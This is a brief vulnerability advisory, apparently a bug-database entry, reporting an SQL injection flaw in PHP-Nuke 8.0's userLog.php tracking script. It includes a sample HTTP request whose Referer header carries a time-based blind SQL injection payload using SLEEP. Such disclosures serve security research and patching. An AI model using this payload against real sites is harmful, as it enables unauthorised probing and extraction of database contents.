PHP-Nuke 'main/tracking/userLog.php' SQL Injection Vulnerability

PHP-Nuke 'main/tracking/userLog.php' SQL Injection Vulnerability

Attackers can use readily available network utilities to exploit this issue.

The following sample request is available:

GET http://www.example.com/PHP-Nuke-8.0/index.php HTTP/1.0
Accept: */*
referer: '+IF(False,'',SLEEP(5))+'